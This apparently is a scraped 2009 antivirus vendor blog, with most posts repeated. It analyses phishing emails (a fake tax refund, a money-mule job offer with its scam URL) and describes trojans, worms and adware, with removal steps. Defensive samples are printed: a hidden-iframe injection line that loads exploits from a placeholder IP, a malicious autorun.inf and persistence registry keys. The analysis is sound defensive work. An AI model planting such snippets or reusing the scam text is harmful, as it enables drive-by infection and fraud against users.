Usually when you type a wrong address for a website, you will get a 'so called' 404 page. Actually 404 is an error code given by the web server when a requested page was not found. Now, if you are a web developer or an administrator for a domain, you may want to redirect the users to the main page (let's say index.html)
All you have to do is to add this rule in your .htaccess file:
ErrorDocument 404 /index.html
Enjoy :)
Saturday, March 14, 2009
Friday, March 13, 2009
Money from Canadian Revenue Agency
I think I'm lucky this year. I just received an e-mail from the Canada Revenue Agency telling me that I'm eligible for a tax refund of 386.00
Cool!!! .. but hey, I don't live in Canada, what is going on ?
The e-mail looks ok, as you can see below:
Now, the fake website for the online refund form is in Taiwan and last time I looked, Taiwan wasn't a part of Canada.
If we start analyzing we can see that this is just another case of identity theft. You have there the following elements:
Social Insurance Number, DOB(date of birth), and the Full Name.
So, unfortunatelly it's just a spam, it was too good to be true, maybe next time..
Cool!!! .. but hey, I don't live in Canada, what is going on ?
The e-mail looks ok, as you can see below:
Canada Revenue Agency
Online Refund Form
After the last annual calculation of your fiscal activity we have determined that you are eligible to receive a tax refund of 386.00.
Please submit the tax refund and allow us 3-9 days in order to process it.
A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.
To access the form for your tax refund, please click here
Copyright Canada Revenue Agency. All rights reserved. www.cra-arc.gc.ca
Now, the fake website for the online refund form is in Taiwan and last time I looked, Taiwan wasn't a part of Canada.
If we start analyzing we can see that this is just another case of identity theft. You have there the following elements:
Social Insurance Number, DOB(date of birth), and the Full Name.
So, unfortunatelly it's just a spam, it was too good to be true, maybe next time..
Happy greetings e-card is waiting for you
The anatomy of a greeting:
Just opened the mail in the morning and I see in the junk folder an interesting message.
It appeares that someone sent me an e-card, too bad is not my birthday.
The mail looks like this:
Carol has sent an e-card.
Your Greeting card will be available at:
hxxp://greetingcardcalendar.com/ID=?-XXXXX..X-
This card was sent from 123greetings.com!
At first glance this may look valid to anyone. 123greetings.com is a valid websites with some lovely e-cards.
Now the question that arise, is why the link isn't from 123greetings.com ?
So, we downloaded the webpage and had such a "BIG" surprise, it has a link to a "card.exe". Now that's funny.
How many clean exe e-cards from 123greetings have you seen ? The correct answer is NONE
Fortunately, the "card.exe" (MD5:88dfdfa6ba077c18df753f279a51258d) is already detected by us and several antivirus scanners:
Email-Worm.Win32.Iksmas.by(Kaspersky), W32/Waledac.gen.a(McAfee), Trojan:Win32/Waledac.B(Microsoft)
So, we can learn from this e-mail the fact that even if someone sends us a message that appears to be from a valid website, always check the link to see where it points to.
Enjoy :)
Just opened the mail in the morning and I see in the junk folder an interesting message.
It appeares that someone sent me an e-card, too bad is not my birthday.
The mail looks like this:
Carol has sent an e-card.
Your Greeting card will be available at:
hxxp://greetingcardcalendar.com/ID=?-XXXXX..X-
This card was sent from 123greetings.com!
At first glance this may look valid to anyone. 123greetings.com is a valid websites with some lovely e-cards.
Now the question that arise, is why the link isn't from 123greetings.com ?
So, we downloaded the webpage and had such a "BIG" surprise, it has a link to a "card.exe". Now that's funny.
How many clean exe e-cards from 123greetings have you seen ? The correct answer is NONE
Fortunately, the "card.exe" (MD5:88dfdfa6ba077c18df753f279a51258d) is already detected by us and several antivirus scanners:
Email-Worm.Win32.Iksmas.by(Kaspersky), W32/Waledac.gen.a(McAfee), Trojan:Win32/Waledac.B(Microsoft)
So, we can learn from this e-mail the fact that even if someone sends us a message that appears to be from a valid website, always check the link to see where it points to.
Enjoy :)
MD5 database for Vista
Here you can find a database with MD5 sums for files that can be found in the %systemdir% in Vista.
How to create a native application in C
First, read this article. So, you will only need a Windows DDK (Driver Development Kit).
After that, you need to create 2 files in your working directory:
makefile
and
sources
Now create your myprog.c file and don't forget to use only Native API's. When you're done, run the checked/free windows ddk command prompt, go to your working folder and type the following command:
If everything was ok, you should have a new folder (like objchk_wxp_x86, objfree_wxp_x86, etc) with an exe in it. Btw, don't forget that you can't run it like a normal windows app!
Enjoy :)
After that, you need to create 2 files in your working directory:
makefile
!INCLUDE $(NTMAKEENV)\makefile.def and
sources
TARGETNAME=myprog
TARGETPATH=OBJ
TARGETTYPE=PROGRAM
SOURCES=myprog.c
Now create your myprog.c file and don't forget to use only Native API's. When you're done, run the checked/free windows ddk command prompt, go to your working folder and type the following command:
build If everything was ok, you should have a new folder (like objchk_wxp_x86, objfree_wxp_x86, etc) with an exe in it. Btw, don't forget that you can't run it like a normal windows app!
Enjoy :)
Trojan.Iframe
- What it is, what it does
[Description]
[Clean]
[Description]
You can find it almost anywhere, it is small and can hardly be seen :)
You can encounter it even on websites that are supposed to be clean because malicious people are using all kinds of exploits for known platforms in order to successfully append a small piece of code to a certain web page.
In order to understand it better, let me show you how it appears:
iframe src='http://IP/path/index.php' width='1' height='1' style='visibility: hidden
(other variants are the same, there are different atributes, sources, etc.. but they have the same behaviour)
As you can see, it isn't something extraordinary, just one line of code.. but let's see what it does.
First it will create an invisible frame that points to a certain website. Usually that website is a fake one or a real one that was hacked.
Now, the content that is received from that IP it is malicious. It can be an exploit, for example a specially crafted image that when is rendered it will trigger a buffer overflow and arbitrary code will be executed. This has the potential to take over the entire machine and add it to a very large botnet.
A botnet is a network of zombie computers that have the purpose to serve a malicious person. They can send spam, attack other computer causing a Denial Of Service, etc...
Also, it can add a keylogger in order to gather passwords, credit card numbers and other confidential informations.
Their primary purpose is to gather money, so they will continue to do this and alot more in order to ensure that.
Now, as you can see, with just one line of code someone can have access to your entire system. It can even monitor your activity right now...
[Clean]
What you can do in order to prevent this.. hmm.. not much. If you are a regular user that don't want to do complicated things, then you can just have an antivirus installed and keep your computer updated.
If you are a person that cares very much about security then you can add a few more layers of protection, for example you can just use a virtual machine (VMWare, VirtualPC, etc..) in order to navigate on the internet.
But usually if you have a good antivirus installed and updated, then you can say that you are protected, but don't navigate on malicious websites :)
Still, if the antivirus warns you about it, then usually all you have to do is to delete the infected file (this can be achieved by deleting the temporary internet files, or the cache, it depends on your browser).
Trojan.VB.28672
(aka Win-Trojan/Landa.28672, Trojan.VB.AE, Worm/VB.JZ, W32/Backdoor.IBK, Trj/Riwomuz.A, Trojan.Fasiat )
[Description]
The trojan aims to appear as a valid picture, movie or a valid application.
This is the spreading method, by searching for media files or applications and coping itself there with a similar name
When it is run, it will show a message box with one of the following fake errors:
After that it start to search in all the folders for media files (avi, jpg and mp3 extensions)
If it finds a media file, then it copies itself in the same folder, borrow the same name
but adds the .exe extension (eq: picture1.jpg.exe)
Also, it search for application files (exe extension)
If it finds an exe file, then it copies itself in the same folder but it will add a random letter
in front of the name.
Also it checks the size of every file and if it is 28,672 bytes, it will not infect it. It does that
in order to avoid creating a copy for a file that is already infected
You can easily check if the virus is active by opening Task Manager and looking for a "L_and_A"
application like in the following picture:
[Clean]
Download our removal tool (Trojan.VB.28672-removaltool.zip) and restart the system in safe mode.
Extract the contents of the zip file to a folder. After that go to the folder where you have extracted
the contents of the archive and double click on the removaltool application. An easy to use graphical
interface will appear. You have to check the "Scan and clean" option and press on the "Scan" button.
[Description]
The trojan aims to appear as a valid picture, movie or a valid application.
This is the spreading method, by searching for media files or applications and coping itself there with a similar name
When it is run, it will show a message box with one of the following fake errors:
After that it start to search in all the folders for media files (avi, jpg and mp3 extensions)
If it finds a media file, then it copies itself in the same folder, borrow the same name
but adds the .exe extension (eq: picture1.jpg.exe)
Also, it search for application files (exe extension)
If it finds an exe file, then it copies itself in the same folder but it will add a random letter
in front of the name.
Also it checks the size of every file and if it is 28,672 bytes, it will not infect it. It does that
in order to avoid creating a copy for a file that is already infected
You can easily check if the virus is active by opening Task Manager and looking for a "L_and_A"
application like in the following picture:
[Clean]
Download our removal tool (Trojan.VB.28672-removaltool.zip) and restart the system in safe mode.
Extract the contents of the zip file to a folder. After that go to the folder where you have extracted
the contents of the archive and double click on the removaltool application. An easy to use graphical
interface will appear. You have to check the "Scan and clean" option and press on the "Scan" button.
VB Alcan Worm
(aka Win32/Alcan.J, Win32.Worm.VB.Ymeak.A, Trojan.Dropper.Win32.VB.Lu )
[Description]
This worm is designed to spread by using various P2P file sharing applications
When it is executed it will create a copy in the startup folder for all users
with the name svchost.exe
After that it will show a message in order to fool the user that the file can't be run:
The setup file is corrupted
After you click on OK, it will launch the svchost copy and the original program
will end it's execution
The new svchost process will begin to search the Windows folder for various files
that are usually backdoors:
winlog.exe, p2pnetworking.exe, scvhost.exe, winlogi.exe and p2pnetwork.exe
If it can't find any of those files, it will drop a new UPX packed backdoor in the Windows folder
called b.exe
After that it will try to spread by searching for the following P2P file sharing programs:
BearShare, Limewire, Morpheus, Shareaza
If it find any of those it will create a subfolder in the shared folder, with the name _ (underscore)
In that folder it will create a copy in order to fool other users in downloading and infecting
their machines
In order to avoid detection and to protect itself from deletion, it will open for exclusive access
the following programs: cmd.exe, ipconfig.exe, netstat.exe, ping.exe, tracert.exe,
regedit.exe, regedt32.exe, taskkill.exe and taskmgr.exe
By doing this it will stop you from launching a registry editor or task manager for example
When you try to open one of those progams it will show a message telling that the program is
in use.
[Clean]
It is best to restart the system in safe mode in order to prevent non-critical processes to run at startup
Delete the svchost.exe file from the startup folder
(usually this is: C:\Documents and Settings\All users\Start Menu\Programs\Startup)
Delete the b.exe file that is located in the Windows folder
[Description]
This worm is designed to spread by using various P2P file sharing applications
When it is executed it will create a copy in the startup folder for all users
with the name svchost.exe
After that it will show a message in order to fool the user that the file can't be run:
The setup file is corrupted
After you click on OK, it will launch the svchost copy and the original program
will end it's execution
The new svchost process will begin to search the Windows folder for various files
that are usually backdoors:
winlog.exe, p2pnetworking.exe, scvhost.exe, winlogi.exe and p2pnetwork.exe
If it can't find any of those files, it will drop a new UPX packed backdoor in the Windows folder
called b.exe
After that it will try to spread by searching for the following P2P file sharing programs:
BearShare, Limewire, Morpheus, Shareaza
If it find any of those it will create a subfolder in the shared folder, with the name _ (underscore)
In that folder it will create a copy in order to fool other users in downloading and infecting
their machines
In order to avoid detection and to protect itself from deletion, it will open for exclusive access
the following programs: cmd.exe, ipconfig.exe, netstat.exe, ping.exe, tracert.exe,
regedit.exe, regedt32.exe, taskkill.exe and taskmgr.exe
By doing this it will stop you from launching a registry editor or task manager for example
When you try to open one of those progams it will show a message telling that the program is
in use.
[Clean]
It is best to restart the system in safe mode in order to prevent non-critical processes to run at startup
Delete the svchost.exe file from the startup folder
(usually this is: C:\Documents and Settings\All users\Start Menu\Programs\Startup)
Delete the b.exe file that is located in the Windows folder
Trojan.VB.AQT
(aka TR/VB.aqt )
[Description]
This trojan is designed to spread by creating copies in the removable drives.
When it is run, it check if there is a folder called Recycled in the root of the drive.
If the folder doesn't exists it will create it.
It will create a file called info2 and one called desktop.ini in the Recycled folder.
The desktop.ini file has the following contents:
In will create a subfolder with the name Recycled where it will put an own copy
with the name ctfmon.exe
It creates the file autorun.inf in the root drive with the following contents:
It reads the value of the registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Startup
which represents the path of the Startup folder of the current user.
It will copy there the ctfmon.exe file
[Clean]
Open Task Manager and terminate the ctfmon.exe process
Delete the ctfmon.exe file from the Startup folder
Delete the files:
(this should be done also for infected removable drives)
autorun.inf Recycled\destop.ini Recycled\info2 Recycled\Recycled\ctfmon.exe
[Description]
This trojan is designed to spread by creating copies in the removable drives.
When it is run, it check if there is a folder called Recycled in the root of the drive.
If the folder doesn't exists it will create it.
It will create a file called info2 and one called desktop.ini in the Recycled folder.
The desktop.ini file has the following contents:
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
In will create a subfolder with the name Recycled where it will put an own copy
with the name ctfmon.exe
It creates the file autorun.inf in the root drive with the following contents:
[autorun]
shellexecute=Recycled\Recycled\ctfmon.exe
shell\Open(&O)\command=Recycled\Recycled\ctfmon.exe
shell=Open(&0)
It reads the value of the registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Startup
which represents the path of the Startup folder of the current user.
It will copy there the ctfmon.exe file
[Clean]
Open Task Manager and terminate the ctfmon.exe process
Delete the ctfmon.exe file from the Startup folder
Delete the files:
(this should be done also for infected removable drives)
autorun.inf Recycled\destop.ini Recycled\info2 Recycled\Recycled\ctfmon.exe
Adware Spywad
( aka Adware/Spywad, Adware.Spywad, SpySheriff, Trojan.Renos, W32/Renos )
[Description]
When it is run it will copy itself in the C:\Windows directory under the name xpupdate.exe
It will add a key in:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows update loader so it can run at startup
It will check if the file MalwareAlarm from the C:\Program Files\MalwareAlarm directory exists
It will create a thread and it will search for dialog windows so it ca answer automatically to
Windows Firewall queries in order to get access to internet
It will download the MalwareAlarm program.
It will create the MalwareAlarm.lic file
It will change the background, it will remove icons, shortcuts and other items from the desktop
It will disable the options to modify the wallpaper, so the user interface will be like the one for Windows NT 4.0
It will show messages that the system is infected with spyware/adware
It will create/modify the following registry keys:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows update loader
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoAddingComponents
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoEditingComponents
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoDeletingComponents
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoComponents
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoHTMLWallPaper
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceActiveDesktopOn
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\Wallpaper
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\WallpaperStyle
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\TileWallpaper
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\WallpaperFileTime
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\WallpaperLocalFileTime
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\ComponentsPositioned
[Clean]
Open Task Manager and end/terminate the xpupdate.exe process
Delete the C:\Windows\xpupdate.exe file
Delete the registry keys:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows update loader
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceActiveDesktopOn
[Description]
When it is run it will copy itself in the C:\Windows directory under the name xpupdate.exe
It will add a key in:
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows update loader so it can run at startup
It will check if the file MalwareAlarm from the C:\Program Files\MalwareAlarm directory exists
It will create a thread and it will search for dialog windows so it ca answer automatically to
Windows Firewall queries in order to get access to internet
It will download the MalwareAlarm program.
It will create the MalwareAlarm.lic file
It will change the background, it will remove icons, shortcuts and other items from the desktop
It will disable the options to modify the wallpaper, so the user interface will be like the one for Windows NT 4.0
It will show messages that the system is infected with spyware/adware
It will create/modify the following registry keys:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows update loader
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoAddingComponents
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoEditingComponents
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoDeletingComponents
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoComponents
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoHTMLWallPaper
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceActiveDesktopOn
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\Wallpaper
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\WallpaperStyle
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\TileWallpaper
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\WallpaperFileTime
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\WallpaperLocalFileTime
HKCU\Software\Microsoft\Internet Explorer\Desktop\General\ComponentsPositioned
[Clean]
Open Task Manager and end/terminate the xpupdate.exe process
Delete the C:\Windows\xpupdate.exe file
Delete the registry keys:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Windows update loader
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ForceActiveDesktopOn
Trojan Winfixer
(aka Application/ErrorSafe, Trojan.Downloader.Winfixer.O, Win32/Winfixer )
[Description]
This is a program designed to trick the user that the computer has errors and in order to fix them he/she needs to buy it.
When it is first launched it shows a message to inform the you that it will download and install a program called ErrorSafe.
After the download is finished, the program is automatically installed and a system scan is made.
When the scan is finished a fake report will be shown with the result that the system has many critical errors.
If you click on the Repair button, you will be redirected to a website in order to purchase the full version of the program
The errors that are presented in the report do not exists and are shown only to convice you that you need to buy the program
After the program is installed, it will automatically set to run on every startup, by creating the following registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
UERScw - C:\Program Files\ErrorSafe Free\UERScw.exe
was_check - C:\Program Files\ErrorSafe Free\PASmon.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ErrorSafeFree - C:\Program Files\ErrorSafe Free\uers.exe
Also it will add the following CLSID's in the registry:
{25F43076-32B8-4828-A88C-8288EEE53396}
{3EB15ED2-15A6-4E1A-B84A-ACFAE64583E1}
{53D5C0AF-1B61-44A1-8739-31ABD4117D8D}
{6EF91405-4FCB-4633-BAB3-FA5B3DC40C3B}
{703BDF83-2C12-4d20-8BB0-106DDAB01B59}
{7300F6AF-78E6-4167-845A-6089879F1DB0}
{C5531D07-22C2-418B-85B9-D829AF1498B0}
{E0767047-9D25-4a3a-B905-852CDA087E86}
{E7296F98-6668-419c-AE1D-04ED641E7C3E}
{F585CB1F-F17D-4007-A573-B663197EF500}
[Clean]
In order to clean the program you can go to Control Panel->Add remove programs.
Then select ErrorSafe and click on the Remove button
After that is best if you open regedit and run a search for the CLSID's that were listed in the
description of this trojan. If you find any of those keys you can delete it
It is recommended that before you do any modification, you back up your registry or your system.
[Description]
This is a program designed to trick the user that the computer has errors and in order to fix them he/she needs to buy it.
When it is first launched it shows a message to inform the you that it will download and install a program called ErrorSafe.
After the download is finished, the program is automatically installed and a system scan is made.
When the scan is finished a fake report will be shown with the result that the system has many critical errors.
If you click on the Repair button, you will be redirected to a website in order to purchase the full version of the program
The errors that are presented in the report do not exists and are shown only to convice you that you need to buy the program
After the program is installed, it will automatically set to run on every startup, by creating the following registry keys:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
UERScw - C:\Program Files\ErrorSafe Free\UERScw.exe
was_check - C:\Program Files\ErrorSafe Free\PASmon.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ErrorSafeFree - C:\Program Files\ErrorSafe Free\uers.exe
Also it will add the following CLSID's in the registry:
{25F43076-32B8-4828-A88C-8288EEE53396}
{3EB15ED2-15A6-4E1A-B84A-ACFAE64583E1}
{53D5C0AF-1B61-44A1-8739-31ABD4117D8D}
{6EF91405-4FCB-4633-BAB3-FA5B3DC40C3B}
{703BDF83-2C12-4d20-8BB0-106DDAB01B59}
{7300F6AF-78E6-4167-845A-6089879F1DB0}
{C5531D07-22C2-418B-85B9-D829AF1498B0}
{E0767047-9D25-4a3a-B905-852CDA087E86}
{E7296F98-6668-419c-AE1D-04ED641E7C3E}
{F585CB1F-F17D-4007-A573-B663197EF500}
[Clean]
In order to clean the program you can go to Control Panel->Add remove programs.
Then select ErrorSafe and click on the Remove button
After that is best if you open regedit and run a search for the CLSID's that were listed in the
description of this trojan. If you find any of those keys you can delete it
It is recommended that before you do any modification, you back up your registry or your system.
Fake job offer from Aegis Capital Group LLC - phishing scam!
[Description]
This days have started with another phishing scam. It is about a fake job offer that appear to be from Aegis Capital Group.
In the fake mail, a position of an "Account manager" is offered (possibly other positions too).
The e-mail is similar to this one:
Subject: the reply for your request for a job place
Dear sirs,
Aegis Capital Group LLC ("Aegis") is a specialty investment firm managing private
equity and venture capital funds with a national focus on small businesses and the
social benefits of supporting entrepreneurs and enhancing local job creation. We
would like to stress, that our company pays special attention to customer support of
private customers, though we also have the corresponding business plans for the
bigger companies as well. A more detailed information about our company you may
obtain at our official website.
Due to the necessity for expansion of our company, we have announced some additional
openings for new employees. We are glad to offer you one of the vacant positions in
our company's team - a position of the "Account manager".
You will have the responsibility for the following duties: fulfillment of orders
given by the company, operations with the bank transfers(direct deposits and wires)
from customers, implementation of calculations regarding customer payments,
acceleration of the space needed for the delivery of payments to the regional
branches by provision of money transactions (customers' payments) via worldwide
Western Union instant transfer system, proces sion of correspondence by means of
mail forwarding and scanning.
The position offered is regarded to be a part-time job, so you will only need to
have about 1 free hour a day to be able to work with us. You will earn a net 10%
commission for every transaction you dealt with. All the traveling expenses and
transfer fee charges are covered by the customer.
You do not need any previous experience in finance sphere, because we will provide
you with the most detailed instructions, support and advice at each stage of the
responsibilities' implementation.
You may hope for the career growth within our company. Under certain circumstances
you will have a chance of providing your services to major companies and VIP
customers. In such a case, both your salary and your status in our company will
sustain an increase.
You may find more detailed info at our website by following hyperlink:
http://joboffer-705236799.acapsite.hk/?vacancy
Sincerely Yours,
HR Manager
------------------------------------------------------------------------------------------------
23ER: 0x25, 0x9, 0x807, 0x71, 0x1, 0x20, 0x94142014 define, include, 3NOG, 9R1X,
6EZV, 5MRH, serv, rev 0x540, 0x6686, 0x26104432, 0x8, 0x4 0x6254, 0x956, 0x352,
0x113 0x1, 0x3458, 0x9250, 0x7724, 0x1617, 0x7445, 0x4, 0x4, 0x115, 0x3173, 0x46,
0x5893 start: 0x48, 0x32126384, 0x672, 0x59893939, 0x993 0x49, 0x690, 0x29, 0x4,
0x282, 0x81690919, 0x71414262, 0x6466 rev: 0x8, 0x883 0x0, 0x92, 0x656, 0x41, 0x74
cvs: 0x04, 0x08, 0x5, 0x82200683 hex: 0x2, 0x1, 0x99, 0x963, 0x347, 0x95402052,
0x75830979, 0x103, 0x77, 0x052, 0x99099833, 0x79, 0x0 0x262, 0x42392905, 0x33731166,
0x7, 0x716 revision 0x7, 0x57, 0x7, 0x75167738, 0x19831344, 0x09433879, 0x0245, 0x52
N8X: 0x346, 0x38, 0x021 NGAT start EYWF update stack. engine: 0x1, 0x62, 0x3,
0x88537985, 0x2476, 0x51, 0x2490, 0x5582, 0x0 4OX: 0x7, 0x456, 0x358, 0x22 0x2, 0
x22, 0x600, 0x7600, 0x6934, 0x3564, 0x97856999, 0x9389, 0x134, 0x0489, 0x428
exe: 0x44525026, 0x550, 0x9, 0x70120259, 0x7041, 0x32861171, 0x2, 0x8, 0x630, 0x217,
0x4531, 0x7 0x3, 0x57201999, 0x24332371, 0x975, 0x1 0x0997, 0x48, 0x42, 0x36,
0x34711792, 0x6, 0x70293266, 0x45130159 define: 0x96, 0x790 dec.ABZ: 0x90819536,
0x6283, 0x70162084, 0x69498055 0x9, 0x4, 0x650, 0x998, 0x3529, 0x8, 0x83820593 0x0,
0x5, 0x84, 0x1, 0x82063113, 0x9769 LTB tmp close hex S8Y VEV define update DQD2
define: 0x34799739, 0x44, 0x1286, 0x59249852, 0x18, 0x21, 0x88298606, 0x814,
0x39825588
By following the link given in the offer we are presented "job vacancy" page
If we select to fill theonline form then we are presented with a "contract page"
where we must complete some fields were among other personal data there is one called
SSN (Social Security Number). More information on SSN can be found here
Also, besides the SSN, there are fields that request bank account no, type of account, account name, etc...
It is just one case among many others were the name of a known company is used in an identity theft scam.
Our advice is to ignore this type of e-mail and delete it from your INBOX.
This days have started with another phishing scam. It is about a fake job offer that appear to be from Aegis Capital Group.
In the fake mail, a position of an "Account manager" is offered (possibly other positions too).
The e-mail is similar to this one:
Subject: the reply for your request for a job place
Dear sirs,
Aegis Capital Group LLC ("Aegis") is a specialty investment firm managing private
equity and venture capital funds with a national focus on small businesses and the
social benefits of supporting entrepreneurs and enhancing local job creation. We
would like to stress, that our company pays special attention to customer support of
private customers, though we also have the corresponding business plans for the
bigger companies as well. A more detailed information about our company you may
obtain at our official website.
Due to the necessity for expansion of our company, we have announced some additional
openings for new employees. We are glad to offer you one of the vacant positions in
our company's team - a position of the "Account manager".
You will have the responsibility for the following duties: fulfillment of orders
given by the company, operations with the bank transfers(direct deposits and wires)
from customers, implementation of calculations regarding customer payments,
acceleration of the space needed for the delivery of payments to the regional
branches by provision of money transactions (customers' payments) via worldwide
Western Union instant transfer system, proces sion of correspondence by means of
mail forwarding and scanning.
The position offered is regarded to be a part-time job, so you will only need to
have about 1 free hour a day to be able to work with us. You will earn a net 10%
commission for every transaction you dealt with. All the traveling expenses and
transfer fee charges are covered by the customer.
You do not need any previous experience in finance sphere, because we will provide
you with the most detailed instructions, support and advice at each stage of the
responsibilities' implementation.
You may hope for the career growth within our company. Under certain circumstances
you will have a chance of providing your services to major companies and VIP
customers. In such a case, both your salary and your status in our company will
sustain an increase.
You may find more detailed info at our website by following hyperlink:
http://joboffer-705236799.acapsite.hk/?vacancy
Sincerely Yours,
HR Manager
------------------------------------------------------------------------------------------------
23ER: 0x25, 0x9, 0x807, 0x71, 0x1, 0x20, 0x94142014 define, include, 3NOG, 9R1X,
6EZV, 5MRH, serv, rev 0x540, 0x6686, 0x26104432, 0x8, 0x4 0x6254, 0x956, 0x352,
0x113 0x1, 0x3458, 0x9250, 0x7724, 0x1617, 0x7445, 0x4, 0x4, 0x115, 0x3173, 0x46,
0x5893 start: 0x48, 0x32126384, 0x672, 0x59893939, 0x993 0x49, 0x690, 0x29, 0x4,
0x282, 0x81690919, 0x71414262, 0x6466 rev: 0x8, 0x883 0x0, 0x92, 0x656, 0x41, 0x74
cvs: 0x04, 0x08, 0x5, 0x82200683 hex: 0x2, 0x1, 0x99, 0x963, 0x347, 0x95402052,
0x75830979, 0x103, 0x77, 0x052, 0x99099833, 0x79, 0x0 0x262, 0x42392905, 0x33731166,
0x7, 0x716 revision 0x7, 0x57, 0x7, 0x75167738, 0x19831344, 0x09433879, 0x0245, 0x52
N8X: 0x346, 0x38, 0x021 NGAT start EYWF update stack. engine: 0x1, 0x62, 0x3,
0x88537985, 0x2476, 0x51, 0x2490, 0x5582, 0x0 4OX: 0x7, 0x456, 0x358, 0x22 0x2, 0
x22, 0x600, 0x7600, 0x6934, 0x3564, 0x97856999, 0x9389, 0x134, 0x0489, 0x428
exe: 0x44525026, 0x550, 0x9, 0x70120259, 0x7041, 0x32861171, 0x2, 0x8, 0x630, 0x217,
0x4531, 0x7 0x3, 0x57201999, 0x24332371, 0x975, 0x1 0x0997, 0x48, 0x42, 0x36,
0x34711792, 0x6, 0x70293266, 0x45130159 define: 0x96, 0x790 dec.ABZ: 0x90819536,
0x6283, 0x70162084, 0x69498055 0x9, 0x4, 0x650, 0x998, 0x3529, 0x8, 0x83820593 0x0,
0x5, 0x84, 0x1, 0x82063113, 0x9769 LTB tmp close hex S8Y VEV define update DQD2
define: 0x34799739, 0x44, 0x1286, 0x59249852, 0x18, 0x21, 0x88298606, 0x814,
0x39825588
By following the link given in the offer we are presented "job vacancy" page
If we select to fill theonline form then we are presented with a "contract page"
where we must complete some fields were among other personal data there is one called
SSN (Social Security Number). More information on SSN can be found here
Also, besides the SSN, there are fields that request bank account no, type of account, account name, etc...
It is just one case among many others were the name of a known company is used in an identity theft scam.
Our advice is to ignore this type of e-mail and delete it from your INBOX.
Spylocked adware
(aka Adware.Spylocked, Adware.SpywareLock.A, Adware/Spylocked )
[Description]
This is an Adware program that is designed to show fake messages in order to trick the user in downloading certain programs
When it is executed the malware will create the following registry keys:
HKCR\CLSID\{b23dc537-3e13-44c7-bf67-d8405eb377f7}
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler\{b23dc537-3e13-44c7-bf67-d8405eb377f7}
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Windows Safety Alert, DisplayName
HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Windows Safety Alert, UninstallString
HKLM\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad, bedstead
In order to run at startup, the spylocked adware uses two registry keys:
The SharedTaskScheduler and ShellServiceObjectDelayLoad which is used to load the dll automatically by Explorer.exe
when the computer starts.
It drops a file named rcohty.dll to %WINDIR%\System32 folder.
When the dll is loaded by rundll32 it will do the following:
It verify the existance of the key:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SpywareLocked 3.5
